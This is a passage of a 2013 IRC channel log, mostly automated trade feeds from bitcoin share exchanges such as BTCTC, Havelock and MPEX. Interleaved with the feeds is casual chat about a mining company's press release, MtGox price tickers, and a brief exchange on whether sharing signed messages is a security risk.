06:14:17 [MPEX] [S.MPOE] 5050 @ 0.00087222 = 4.4047 BTC [+] Sep 04 06:14:47 [BTCTC] [COGNITIVE] 1 @ 0.3448 BTC [-] Sep 04 06:15:36 [BTCTC] [LABCOIN] 270 @ 0.0037 = 0.999 BTC [+] Sep 04 06:17:18 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Sep 04 06:17:40 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Sep 04 06:17:58 [BTCTC] [LABCOIN] 37 @ 0.0037 = 0.1369 BTC [+] Sep 04 06:19:31 [HAVELOCK] [DEALCO] 20 @ 0.01499998 = 0.3 BTC [-] Sep 04 06:22:45 [BTCTC] [BTC-GROWTH] 20 @ 0.1022 = 2.044 BTC [+] Sep 04 06:28:13 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [+] Sep 04 06:28:14 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [+] Sep 04 06:29:22 [BTCTC] [MININGCO.ETF] 5 @ 0.1049 = 0.5245 BTC [-] Sep 04 06:31:44 [BTCTC] [RSM] 1 @ 0.011 BTC [+] Sep 04 06:45:34 [HAVELOCK] [SMG] 34 @ 0.0001825 = 0.0062 BTC [-] Sep 04 06:46:02 [HAVELOCK] [SMG] 22 @ 0.000182 = 0.004 BTC [-] Sep 04 06:46:42 [HAVELOCK] [SMG] 64 @ 0.000181 = 0.0116 BTC [-] Sep 04 06:46:49 [HAVELOCK] [SMG] 50 @ 0.00018 = 0.009 BTC [-] Sep 04 06:47:05 [HAVELOCK] [SMG] 29 @ 0.0001788 = 0.0052 BTC [-] Sep 04 06:47:08 [HAVELOCK] [SMG] 88 @ 0.0001786 = 0.0157 BTC [-] Sep 04 06:47:10 [HAVELOCK] [SMG] 417 @ 0.0001734 = 0.0723 BTC [-] Sep 04 06:47:12 [HAVELOCK] [SMG] 417 @ 0.0001734 = 0.0723 BTC [-] Sep 04 06:47:14 [HAVELOCK] [SMG] 417 @ 0.0001734 = 0.0723 BTC [-] Sep 04 06:47:15 [HAVELOCK] [SMG] 417 @ 0.0001733 = 0.0723 BTC [-] Sep 04 06:47:18 [HAVELOCK] [SMG] 417 @ 0.0001733 = 0.0723 BTC [-] Sep 04 06:47:20 [HAVELOCK] [SMG] 417 @ 0.0001733 = 0.0723 BTC [-] Sep 04 06:47:22 [HAVELOCK] [SMG] 417 @ 0.0001732 = 0.0722 BTC [-] Sep 04 06:47:24 [HAVELOCK] [SMG] 418 @ 0.0001731 = 0.0724 BTC [-] Sep 04 06:47:25 417 Sep 04 06:47:26 [HAVELOCK] [SMG] 746 @ 0.000172 = 0.1283 BTC [-] Sep 04 06:47:28 [HAVELOCK] [SMG] 50 @ 0.000171 = 0.0086 BTC [-] Sep 04 06:47:30 [BTCTC] [ASICMINER-PT] 1 @ 2.519 BTC [+] Sep 04 06:47:31 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [+] Sep 04 06:47:32 [HAVELOCK] [SMG] 566 @ 0.0001702 = 0.0963 BTC [-] Sep 04 06:47:34 [BTCTC] [ASICMINER-PT] 1 @ 2.521 BTC [+] Sep 04 06:47:35 [BTCTC] [ASICMINER-PT] 1 @ 2.523 BTC [+] Sep 04 06:47:36 [HAVELOCK] [SMG] 1654 @ 0.0001701 = 0.2813 BTC [-] Sep 04 06:47:37 [BTCTC] [ASICMINER-PT] 1 @ 2.526 BTC [+] Sep 04 06:47:38 [BTCTC] [ASICMINER-PT] 2 @ 2.538 = 5.076 BTC [+] Sep 04 06:47:39 [HAVELOCK] [SMG] 610 @ 0.00017005 = 0.1037 BTC [-] Sep 04 06:47:41 [BTCTC] [ASICMINER-PT] 2 @ 2.54 = 5.08 BTC [+] Sep 04 06:47:42 [BTCTC] [ASICMINER-PT] 3 @ 2.548 = 7.644 BTC [+] Sep 04 06:47:43 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] Sep 04 06:47:44 [BTCTC] [ASICMINER-PT] 3 @ 2.55 = 7.65 BTC [+] Sep 04 06:47:45 [BTCTC] [ASICMINER-PT] 1 @ 2.553 BTC [+] Sep 04 06:47:46 [BTCTC] [ASICMINER-PT] 3 @ 2.558 = 7.674 BTC [+] Sep 04 06:47:47 [BTCTC] [ASICMINER-PT] 2 @ 2.559 = 5.118 BTC [+] Sep 04 06:47:48 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [+] Sep 04 06:47:48 [BTCTC] [ASICMINER-PT] 2 @ 2.56 = 5.12 BTC [+] Sep 04 06:47:49 [BTCTC] [ASICMINER-PT] 1 @ 2.563 BTC [+] Sep 04 06:47:50 [BTCTC] [ASICMINER-PT] 1 @ 2.565 BTC [+] Sep 04 06:47:51 [BTCTC] [ASICMINER-PT] 2 @ 2.575 = 5.15 BTC [+] Sep 04 06:47:52 [BTCTC] [ASICMINER-PT] 3 @ 2.58 = 7.74 BTC [+] Sep 04 06:47:53 [BTCTC] [ASICMINER-PT] 1 @ 2.582 BTC [+] Sep 04 06:47:54 [BTCTC] [ASICMINER-PT] 1 @ 2.587 BTC [+] Sep 04 06:47:55 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [+] Sep 04 06:47:55 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [+] Sep 04 06:47:56 [BTCTC] [ASICMINER-PT] 3 @ 2.589 = 7.767 BTC [+] Sep 04 06:47:57 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [+] Sep 04 06:47:58 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [+] Sep 04 06:47:59 [BTCTC] [ASICMINER-PT] 5 @ 2.59 = 12.95 BTC [+] Sep 04 06:48:00 [BTCTC] [ASICMINER-PT] 1 @ 2.593 BTC [+] Sep 04 06:48:01 [BTCTC] [ASICMINER-PT] 1 @ 2.594 BTC [+] Sep 04 06:48:02 [BTCTC] [ASICMINER-PT] 1 @ 2.595 BTC [+] Sep 04 06:48:03 [BTCTC] [ASICMINER-PT] 5 @ 2.598 = 12.99 BTC [+] Sep 04 06:48:04 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Sep 04 06:48:05 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [+] Sep 04 06:48:06 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [+] Sep 04 06:48:07 [BTCTC] [ASICMINER-PT] 21 @ 2.6 = 54.6 BTC [+] Sep 04 06:48:08 [HAVELOCK] [DEALCO] 5 @ 0.01499998 = 0.075 BTC [-] Sep 04 06:48:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.02349 = 0.3524 BTC [-] Sep 04 06:48:23 [HAVELOCK] [DEALCO] 2 @ 0.01499999 = 0.03 BTC [+] Sep 04 06:53:59 [BTCTC] [LABCOIN] 1000 @ 0.00369 = 3.69 BTC [-] Sep 04 06:54:10 [MPEX] [S.MPOE] 2531 @ 0.00087222 = 2.2076 BTC [+] Sep 04 06:54:11 [MPEX] [S.MPOE] 1169 @ 0.00087269 = 1.0202 BTC [+] Sep 04 06:55:39 [BTCTC] [MININGCO.ETF] 10 @ 0.105 = 1.05 BTC [+] Sep 04 06:58:08 [BTCTC] [LABCOIN] 483 @ 0.0037 = 1.7871 BTC [+] Sep 04 07:00:29 [BTCTC] [DMS.PURCHASE] 50 @ 0.01578 = 0.789 BTC [+] Sep 04 07:00:52 [BTCTC] [DMS.MINING] 3 @ 0.00287 = 0.0086 BTC [-] Sep 04 07:00:52 [BTCTC] [DMS.MINING] 1209 @ 0.002869 = 3.4686 BTC [-] Sep 04 07:02:39 [BTCTC] [LABCOIN] 600 @ 0.0037 = 2.22 BTC [+] Sep 04 07:05:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.02349 = 0.2349 BTC [-] Sep 04 07:05:56 [BTCTC] [TAT.ASICMINER] 21 @ 0.02349 = 0.4933 BTC [-] Sep 04 07:10:40 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Sep 04 07:20:55 [BTCTC] [TAT.ASICMINER] 45 @ 0.0235 = 1.0575 BTC [+] Sep 04 07:20:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.0235 = 0.235 BTC [+] Sep 04 07:32:14 [BTCTC] [ASICMINER-PT] 1 @ 2.589 BTC [-] Sep 04 07:32:14 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [+] Sep 04 07:32:15 [BTCTC] [ASICMINER-PT] 1 @ 2.599 BTC [+] Sep 04 07:32:17 [BTCTC] [ASICMINER-PT] 3 @ 2.599 = 7.797 BTC [+] Sep 04 07:32:18 [BTCTC] [ASICMINER-PT] 19 @ 2.6 = 49.4 BTC [+] Sep 04 07:32:19 [BTCTC] [ASICMINER-PT] 4 @ 2.6 = 10.4 BTC [+] Sep 04 07:36:25 [BTCTC] [BTC-GROWTH] 1 @ 0.1001 BTC [-] Sep 04 07:39:56 [BTCTC] [LABCOIN] 60 @ 0.0037 = 0.222 BTC [+] Sep 04 07:46:55 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Sep 04 07:46:56 [BTCTC] [BTC-GROWTH] 47 @ 0.1 = 4.7 BTC [-] Sep 04 07:47:35 [HAVELOCK] [AM1] 1 @ 2.43 BTC [+] Sep 04 07:47:44 [MPEX] [S.MPOE] 1453 @ 0.0008717 = 1.2666 BTC [-] Sep 04 07:47:56 [HAVELOCK] [LABCO] 38 @ 0.0032 = 0.1216 BTC [+] Sep 04 07:48:06 [HAVELOCK] [LABCO] 1 @ 0.00328 BTC [+] Sep 04 07:48:16 [HAVELOCK] [LABCO] 10 @ 0.00328499 = 0.0328 BTC [+] Sep 04 07:48:27 [BTCTC] [LABCOIN] 955 @ 0.003674 = 3.5087 BTC [-] Sep 04 07:48:32 [HAVELOCK] [LABCO] 1 @ 0.00328499 BTC [+] Sep 04 07:58:57 [BTCTC] [PETA-MINE] 1 @ 0.6303 BTC [-] Sep 04 07:58:59 [BTCTC] [PETA-MINE] 2 @ 0.6302 = 1.2604 BTC [-] Sep 04 07:59:00 [BTCTC] [PETA-MINE] 1 @ 0.6302 BTC [-] Sep 04 07:59:44 [BTCTC] [DMS.SELLING] 78 @ 0.01271 = 0.9914 BTC [-] Sep 04 08:00:14 [BTCTC] [DMS.MINING] 10 @ 0.00287 = 0.0287 BTC [+] Sep 04 08:00:15 [BTCTC] [DMS.MINING] 28 @ 0.002869 = 0.0803 BTC [-] Sep 04 08:04:45 [BTCTC] [DMS.MINING] 563 @ 0.002869 = 1.6152 BTC [-] Sep 04 08:04:47 [BTCTC] [DMS.MINING] 717 @ 0.002868 = 2.0564 BTC [-] Sep 04 08:04:48 [BTCTC] [DMS.MINING] 8 @ 0.002868 = 0.0229 BTC [-] Sep 04 08:04:49 [BTCTC] [DMS.MINING] 13 @ 0.0028 = 0.0364 BTC [-] Sep 04 08:05:08 [MPEX] [S.MPOE] 4758 @ 0.00086815 = 4.1307 BTC [-] Sep 04 08:05:10 [MPEX] [S.MPOE] 472 @ 0.00086718 = 0.4093 BTC [-] Sep 04 08:06:02 [HAVELOCK] [SMG] 57 @ 0.00017007 = 0.0097 BTC [+] Sep 04 08:06:05 [BTCTC] [ASICMINER-PT] 1 @ 2.603 BTC [+] Sep 04 08:06:07 [BTCTC] [ASICMINER-PT] 1 @ 2.604 BTC [+] Sep 04 08:09:03 [BTCTC] [TAT.ASICMINER] 9 @ 0.0238 = 0.2142 BTC [+] Sep 04 08:09:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.0238 BTC [+] Sep 04 08:09:05 [BTCTC] [TAT.ASICMINER] 10 @ 0.0238 = 0.238 BTC [+] Sep 04 08:10:51 [BTCTC] [DMS.PURCHASE] 45 @ 0.0155 = 0.6975 BTC [-] Sep 04 08:10:52 [BTCTC] [DMS.PURCHASE] 55 @ 0.0153 = 0.8415 BTC [-] Sep 04 08:15:00 [BTCTC] [ASICMINER-PT] 1 @ 2.604 BTC [+] Sep 04 08:15:01 [BTCTC] [ASICMINER-PT] 1 @ 2.605 BTC [+] Sep 04 08:15:21 [BTCTC] [ASICMINER-PT] 1 @ 2.605 BTC [+] Sep 04 08:15:42 [BTCTC] [DMS.SELLING] 9 @ 0.01272 = 0.1145 BTC [+] Sep 04 08:15:43 [BTCTC] [DMS.SELLING] 130 @ 0.01271 = 1.6523 BTC [-] Sep 04 08:15:45 [BTCTC] [DMS.SELLING] 287 @ 0.0127 = 3.6449 BTC [-] Sep 04 08:16:05 [BTCTC] [DMS.SELLING] 2 @ 0.01318 = 0.0264 BTC [+] Sep 04 08:17:06 [BTCTC] [LABCOIN] 450 @ 0.0037 = 1.665 BTC [+] Sep 04 08:17:06 [BTCTC] [LABCOIN] 2100 @ 0.0037 = 7.77 BTC [+] **** BEGIN LOGGING AT Thu Sep 5 02:58:31 2013 Sep 05 02:58:35 [HAVELOCK] [AM1] 9 @ 2.37 = 21.33 BTC [+] Sep 05 02:59:44 [BTCTC] [LABCOIN] 248 @ 0.003502 = 0.8685 BTC [-] Sep 05 02:59:46 [BTCTC] [LABCOIN] 252 @ 0.0035 = 0.882 BTC [-] Sep 05 03:00:01 [BTCTC] [LABCOIN] 5 @ 0.003581 = 0.0179 BTC [+] Sep 05 03:00:24 [06:57:32] cue DiabloD3 saying rice is not paleo! Sep 05 03:00:25 [BTCTC] [ACTIVEMINING] 416 @ 0.005117 = 2.1287 BTC [+] Sep 05 03:00:26 [BTCTC] [ACTIVEMINING] 50 @ 0.00512 = 0.256 BTC [+] Sep 05 03:00:26 its not Sep 05 03:00:27 [BTCTC] [ACTIVEMINING] 534 @ 0.005344 = 2.8537 BTC [+] Sep 05 03:00:29 [BTCTC] [LABCOIN] 5 @ 0.00358 = 0.0179 BTC [-] Sep 05 03:00:34 [06:58:10] didnt he want to open a farm at some point or something Sep 05 03:00:39 I hope you dont mean me Sep 05 03:00:40 I didnt Sep 05 03:00:54 [BTCTC] [LABCOIN] 90 @ 0.003616 = 0.3254 BTC [+] Sep 05 03:01:17 DiabloD3!*@* added to ignore list. Sep 05 03:03:02 [BTCTC] [ACTIVEMINING] 21 @ 0.005344 = 0.1122 BTC [+] Sep 05 03:03:04 [BTCTC] [ACTIVEMINING] 416 @ 0.005358 = 2.2289 BTC [+] Sep 05 03:03:05 [BTCTC] [ACTIVEMINING] 49 @ 0.005361 = 0.2627 BTC [+] Sep 05 03:04:22 [BTCTC] [ACTIVEMINING] 178 @ 0.005357 = 0.9535 BTC [-] Sep 05 03:07:25 [BTCTC] [LABCOIN] 144 @ 0.003607 = 0.5194 BTC [-] Sep 05 03:08:37 [BTCTC] [ACTIVEMINING] 281 @ 0.005377 = 1.5109 BTC [+] Sep 05 03:08:57 [BTCTC] [ACTIVEMINING] 1 @ 0.005377 BTC [+] Sep 05 03:11:28 [HAVELOCK] [LABCO] 8 @ 0.0036 = 0.0288 BTC [+] Sep 05 03:12:27 [BTCTC] [LABCOIN] 1 @ 0.003597 BTC [-] Sep 05 03:14:04 [BTCTC] [LABCOIN] 1 @ 0.003596 BTC [-] Sep 05 03:16:04 [BTCTC] [LABCOIN] 1 @ 0.003591 BTC [-] Sep 05 03:16:28 [BTCTC] [ACTIVEMINING] 10 @ 0.0052 = 0.052 BTC [-] Sep 05 03:17:27 [BTCTC] [TAT.ASICMINER] 24 @ 0.02349 = 0.5638 BTC [-] Sep 05 03:18:03 fight! Sep 05 03:18:08 there's a log you guys Sep 05 03:19:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.02349 = 0.2349 BTC [-] Sep 05 03:19:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.02349 = 0.047 BTC [-] Sep 05 03:21:09 [BTCTC] [LABCOIN] 551 @ 0.003586 = 1.9759 BTC [-] Sep 05 03:22:13 [BTCTC] [LABCOIN] 200 @ 0.003587 = 0.7174 BTC [+] Sep 05 03:22:34 [BTCTC] [LABCOIN] 200 @ 0.003587 = 0.7174 BTC [+] Sep 05 03:22:46 [BTCTC] [LABCOIN] 200 @ 0.003587 = 0.7174 BTC [+] Sep 05 03:22:57 [BTCTC] [LABCOIN] 5 @ 0.003589 = 0.0179 BTC [+] Sep 05 03:22:59 [BTCTC] [PAJKA.BOND] 2 @ 0.01249 = 0.025 BTC [+] Sep 05 03:23:26 [BTCTC] [LABCOIN] 249 @ 0.003587 = 0.8932 BTC [-] Sep 05 03:23:27 [BTCTC] [LABCOIN] 185 @ 0.003586 = 0.6634 BTC [-] Sep 05 03:23:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02349 = 0.047 BTC [-] Sep 05 03:23:31 [HAVELOCK] [SMG] 5 @ 0.0002386 = 0.0012 BTC [-] Sep 05 03:24:33 [HAVELOCK] [AM1] 1 @ 2.37 BTC [+] Sep 05 03:27:24 [BTCTC] [ACTIVEMINING] 318 @ 0.005008 = 1.5925 BTC [-] Sep 05 03:27:25 [BTCTC] [ACTIVEMINING] 10 @ 0.005004 = 0.05 BTC [-] Sep 05 03:27:26 [BTCTC] [ACTIVEMINING] 49 @ 0.005004 = 0.2452 BTC [-] Sep 05 03:27:27 [BTCTC] [ACTIVEMINING] 1400 @ 0.005 = 7 BTC [-] Sep 05 03:27:40 [BTCTC] [ASICMINER-PT] 1 @ 2.399 BTC [+] Sep 05 03:27:54 [BTCTC] [LABCOIN] 5 @ 0.003502 = 0.0175 BTC [-] Sep 05 03:27:55 [BTCTC] [LABCOIN] 661 @ 0.003501 = 2.3142 BTC [-] Sep 05 03:28:51 [BTCTC] [ACTIVEMINING] 273 @ 0.004927 = 1.3451 BTC [-] Sep 05 03:28:52 [BTCTC] [ACTIVEMINING] 79 @ 0.004924 = 0.389 BTC [-] Sep 05 03:28:54 [BTCTC] [ACTIVEMINING] 750 @ 0.00492 = 3.69 BTC [-] Sep 05 03:28:55 [BTCTC] [ACTIVEMINING] 2952 @ 0.004919 = 14.5209 BTC [-] Sep 05 03:30:08 [BTCTC] [LABCOIN] 1 @ 0.003595 BTC [+] Sep 05 03:32:37 [BTCTC] [ACTIVEMINING] 200 @ 0.005367 = 1.0734 BTC [+] Sep 05 03:33:40 [HAVELOCK] [AM100] 22 @ 0.022745 = 0.5004 BTC [-] Sep 05 03:34:47 [BTCTC] [LABCOIN] 430 @ 0.003588 = 1.5428 BTC [-] Sep 05 03:35:25 [HAVELOCK] [AM100] 237 @ 0.022745 = 5.3906 BTC [-] Sep 05 03:37:13 [BTCTC] [LABCOIN] 37 @ 0.003587 = 0.1327 BTC [-] Sep 05 03:37:15 [BTCTC] [LABCOIN] 5 @ 0.003591 = 0.018 BTC [+] Sep 05 03:37:16 [BTCTC] [LABCOIN] 5 @ 0.003592 = 0.018 BTC [+] Sep 05 03:37:17 [BTCTC] [LABCOIN] 407 @ 0.003605 = 1.4672 BTC [+] Sep 05 03:37:18 [BTCTC] [LABCOIN] 20 @ 0.003609 = 0.0722 BTC [+] Sep 05 03:37:19 [BTCTC] [LABCOIN] 20 @ 0.00361 = 0.0722 BTC [+] Sep 05 03:37:20 [BTCTC] [LABCOIN] 506 @ 0.003613 = 1.8282 BTC [+] Sep 05 03:39:16 [BTCTC] [LABCOIN] 351 @ 0.00358 = 1.2566 BTC [-] Sep 05 03:39:16 [BTCTC] [LABCOIN] 351 @ 0.003581 = 1.2569 BTC [+] Sep 05 03:39:17 [BTCTC] [LABCOIN] 336 @ 0.003611 = 1.2133 BTC [+] Sep 05 03:39:19 [BTCTC] [LABCOIN] 5 @ 0.003612 = 0.0181 BTC [+] Sep 05 03:39:20 [BTCTC] [LABCOIN] 451 @ 0.003614 = 1.6299 BTC [+] Sep 05 03:39:55 [BTCTC] [LABCOIN] 351 @ 0.003612 = 1.2678 BTC [-] Sep 05 03:39:56 [BTCTC] [LABCOIN] 198 @ 0.003614 = 0.7156 BTC [+] Sep 05 03:40:35 [HAVELOCK] [AM100] 1 @ 0.0227 BTC [-] Sep 05 03:40:40 [BTCTC] [TAT.ASICMINER] 8 @ 0.02349 = 0.1879 BTC [-] Sep 05 03:41:35 ;;ticker Sep 05 03:41:36 MtGox BTCUSD ticker | Best bid: 131.33000, Best ask: 131.60000, Bid-ask spread: 0.27000, Last trade: 131.80000, 24 hour volume: 28466.11500868, 24 hour low: 130.08998, 24 hour high: 145.80000, 24 hour vwap: 136.94775 Sep 05 03:41:43 well that actm news didnt last long Sep 05 03:41:53 what was it ? Sep 05 03:41:59 wow big drop on gox Sep 05 03:42:19 easic said they were working with them Sep 05 03:42:30 no other details though Sep 05 03:42:38 well Sep 05 03:42:46 http://www.easic.com/vmc-uses-easic-to-achieve-24-756-ths-bitcoin-miner/ Sep 05 03:42:46 a lil more detail than that Sep 05 03:42:50 VMC uses eASIC to Achieve 24.756 TH/s Bitcoin Miner | eASIC Corporation Sep 05 03:43:06 easic is still puff as far as anyone knows./ Sep 05 03:43:07 there's only one word in that presser that matters Sep 05 03:43:15 s c a l a b l e Sep 05 03:43:17 They released this press release about their eASIC's ASIC they'll be using Sep 05 03:43:19 and afaik this is not news in any sense, they had been saying it for weeks Sep 05 03:43:52 yeah and no real details of where they are in process Sep 05 03:44:35 we did a simulation and it passed , now to build it Sep 05 03:44:45 vmc/actm coughed up 1 million in funding for that press release! Sep 05 03:45:45 lolk Sep 05 03:46:09 they still have nothing coming until mid/end november. Sep 05 03:46:24 it will flatten out again i'm sure. Sep 05 03:46:28 no way after that imo Sep 05 03:46:30 Even with no costs to develop/run these miners, that scalable platform, even if it mined 24 terahash/s Sep 05 03:46:43 jborkl, youre probably correct, i was saying best case scenario Sep 05 03:47:02 Would take 1000 days to make 0.005 BTC per share Sep 05 03:47:10 i sold out at .085 after the ipo, i'm still happy with that. Sep 05 03:47:16 *.0085 Sep 05 03:47:29 Which is about current price Sep 05 03:47:32 1000 days Sep 05 03:47:38 Before any costs are involved Sep 05 03:47:53 They'd better be getting more than 24TH Sep 05 03:48:04 tits at .004x now i think Sep 05 03:48:07 *its Sep 05 03:48:11 i forgot the command though :( Sep 05 03:48:13 it seems everything it bitcoin is multiplied or divided by 3 Sep 05 03:48:22 3 months 9 months Sep 05 03:48:29 trimesters Sep 05 03:48:36 30 w 90w Sep 05 03:48:39 lol Sep 05 03:50:23 it's really pi Sep 05 03:50:51 reality ^ (Bitcoin / pi) = 1 Sep 05 03:51:34 [BTCTC] [LABCOIN] 100 @ 0.003619 = 0.3619 BTC [+] Sep 05 03:51:48 nice, elegant formula Sep 05 03:52:03 exact opposite of euler's Sep 05 03:54:48 [BTCTC] [BASIC-MINING] 4 @ 0.1401 = 0.5604 BTC [-] Sep 05 03:55:34 [BTCTC] [COGNITIVE] 1 @ 0.3113 BTC [-] Sep 05 03:55:35 [BTCTC] [COGNITIVE] 1 @ 0.3113 BTC [-] Sep 05 03:55:49 [BTCTC] [ACTIVEMINING] 299 @ 0.005306 = 1.5865 BTC [-] Sep 05 03:55:51 [BTCTC] [ACTIVEMINING] 551 @ 0.005309 = 2.9253 BTC [+] Sep 05 03:55:52 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Sep 05 03:55:54 [HAVELOCK] [XBOND] 3 @ 0.0011 = 0.0033 BTC [-] Sep 05 03:55:56 [HAVELOCK] [XBOND] 518 @ 0.0011 = 0.5698 BTC [-] Sep 05 03:56:00 [BTCTC] [COGNITIVE] 1 @ 0.3112 BTC [-] Sep 05 03:56:01 [BTCTC] [COGNITIVE] 1 @ 0.301 BTC [-] Sep 05 03:56:10 [HAVELOCK] [XBOND] 110 @ 0.00109 = 0.1199 BTC [-] Sep 05 03:56:22 [BTCTC] [LTC-ATF.B2] 54 @ 0.01046 = 0.5648 BTC [+] Sep 05 03:56:24 [BTCTC] [LTC-ATF.B2] 12 @ 0.01046 = 0.1255 BTC [+] Sep 05 03:56:25 [BTCTC] [LTC-ATF.B2] 15 @ 0.01046 = 0.1569 BTC [+] Sep 05 03:56:26 [BTCTC] [LTC-ATF.B2] 79 @ 0.01047 = 0.8271 BTC [+] Sep 05 03:56:38 [BTCTC] [COGNITIVE] 1 @ 0.288 BTC [-] Sep 05 03:56:53 [BTCTC] [LTC-ATF.B2] 4 @ 0.01047 = 0.0419 BTC [+] Sep 05 03:57:22 [BTCTC] [COG.F2] 1 @ 4.401 BTC [-] Sep 05 03:57:22 [BTCTC] [COG.F2] 4 @ 4.4 = 17.6 BTC [-] Sep 05 03:58:25 [BTCTC] [LABCOIN] 5 @ 0.003504 = 0.0175 BTC [-] Sep 05 03:58:26 [BTCTC] [LABCOIN] 31 @ 0.003502 = 0.1086 BTC [-] Sep 05 03:58:28 [BTCTC] [LABCOIN] 600 @ 0.003496 = 2.0976 BTC [-] Sep 05 03:58:29 [BTCTC] [LABCOIN] 434 @ 0.003495 = 1.5168 BTC [-] Sep 05 03:58:30 [BTCTC] [LABCOIN] 1321 @ 0.003489 = 4.609 BTC [-] Sep 05 03:59:43 i have a total noob question - but is handing out your signed address signature any security flaw, or is that what someone uses to read the signed message? Sep 05 03:59:57 [MPEX] [S.MPOE] 3250 @ 0.00087892 = 2.8565 BTC [+] Sep 05 03:59:58 [MPEX] [S.MPOE] 4350 @ 0.00088081 = 3.8315 BTC [+] Sep 05 04:00:00 [BTCTC] [TAT.ASICMINER] 2 @ 0.02348 = 0.047 BTC [-] Sep 05 04:00:04 [MPEX] [S.MPOE] 1291 @ 0.00088299 = 1.1399 BTC [+] Sep 05 04:01:35 [BTCTC] [ACTIVEMINING] 1600 @ 0.005288 = 8.4608 BTC [-] Sep 05 04:01:38 [BTCTC] [ACTIVEMINING] 2 @ 0.005288 = 0.0106 BTC [-] Sep 05 04:02:45 [BTCTC] [LABCOIN] 3 @ 0.003555 = 0.0107 BTC [+] Sep 05 04:03:00 [BTCTC] [LABCOIN] 35 @ 0.003555 = 0.1244 BTC [+] Sep 05 04:03:05 chsados__: it's not a secuirty concern at all Sep 05 04:03:08 they use it to verify the message Sep 05 04:03:12 [BTCTC] [NASTY-PT] 1 @ 0.00241 BTC [+] Sep 05 04:03:16 ok thanks frb Sep 05 04:03:44 chsados__ same principle as gpg sigs from what i understand Sep 05 04:04:10 mircea_popescu: are you the real mircea or MPOE-PR Sep 05 04:04:10 however you shouldn't sign anything blindly, someone could make you sign a transaction Sep 05 04:04:19 [BTCTC] [ACTIVEMINING] 18 @ 0.005273 = 0.0949 BTC [-] Sep 05 04:04:22 cool, just wanted to make sure before submitting that info to a steamboat - he sent the mass email from a different email address Sep 05 04:04:27 [BTCTC] [NASTY-PT] 1 @ 0.002411 BTC [+] Sep 05 04:04:50 pankkake, can you think of a situation where someone could screw you by manipulating a signature? Sep 05 04:05:04 [BTCTC] [LABCOIN] 1 @ 0.003554 BTC [-] Sep 05 04:05:08 not really Sep 05 04:05:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02348 BTC [-] Sep 05 04:06:06 mpoe-pr is his alter ego in crime :P Sep 05 04:06:23 [MPEX] [S.MPOE] 6700 @ 0.00088299 = 5.916 BTC [+] Sep 05 04:09:52 [BTCTC] [ASICMINER-PT] 4 @ 2.395 = 9.58 BTC [-] Sep 05 04:10:04 [BTCTC] [ASICMINER-PT] 1 @ 2.423 BTC [+] Sep 05 04:12:35 frb im the real me. Sep 05 04:13:14 chsados__ the one concern is where you sign what appears to you as an innocous message that is then misinterpreted by someone. Sep 05 04:13:47 such as you sign "I agree" and then someone keeps this for ten years and brings it up as your supposed agreement to test his lemonade. Sep 05 04:14:12 (hint: its not lemonade) Sep 05 04:14:21 [BTCTC] [PAJKA.BOND] 1 @ 0.01249 BTC [+] Sep 05 04:14:23 good point mircea_popescu Sep 05 04:14:40 ;;ticker Sep 05 04:14:40 MtGox BTCUSD ticker | Best bid: 127.70000, Best ask: 128.00002, Bid-ask spread: 0.30002, Last trade: 128.00002, 24 hour volume: 32329.08621409, 24 hour low: 127.55000, 24 hour high: 145.80000, 24 hour vwap: 136.08561 Sep 05 04:14:56 is that what happened in jonestown mircea_popescu ? Sep 05 04:15:07 :P Sep 05 04:15:31 i have no idea lol Sep 05 04:15:57 anyway, always make sure you sign statements that are clearly limited. include a date and clear purpose. Sep 05 04:16:14 [BTCTC] [ACTIVEMINING] 6 @ 0.0051 = 0.0306 BTC [-] Sep 05 04:16:16 [BTCTC] [ACTIVEMINING] 1 @ 0.005011 BTC [-] Sep 05 04:16:16 [BTCTC] [ACTIVEMINING] 10 @ 0.00501 = 0.0501 BTC [-] Sep 05 04:16:17 [BTCTC] [ACTIVEMINING] 218 @ 0.005004 = 1.0909 BTC [-] Sep 05 04:16:18 [BTCTC] [ACTIVEMINING] 250 @ 0.005003 = 1.2508 BTC [-] Sep 05 04:16:19 [BTCTC] [ACTIVEMINING] 50 @ 0.005001 = 0.2501 BTC [-] Sep 05 04:16:21 [BTCTC] [ACTIVEMINING] 250 @ 0.005001 = 1.2503 BTC [-] Sep 05 04:16:22 [BTCTC] [ACTIVEMINING] 215 @ 0.005 = 1.075 BTC [-] Sep 05 04:16:32 "Given today, 10th of May, for certifying bumblebee exposure. Not valid for any other purpose." Sep 05 04:18:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.02348 BTC [-] Sep 05 04:18:30 i think my poor attempt at a joke flew over your head https://en.wikipedia.org/wiki/Drinking_the_Kool-Aid#Jonestown_massacre Sep 05 04:18:35 [BTCTC] [LABCOIN] 7 @ 0.003517 = 0.0246 BTC [-] Sep 05 04:18:36 [BTCTC] [LABCOIN] 4 @ 0.003518 = 0.0141 BTC [+] Sep 05 04:19:34 [BTCTC] [ASICMINER-PT] 1 @ 2.423 BTC [+] Sep 05 04:19:35 [BTCTC] [ASICMINER-PT] 1 @ 2.424 BTC [+] Sep 05 04:19:36 [BTCTC] [ASICMINER-PT] 1 @ 2.439 BTC [+] Sep 05 04:19:37 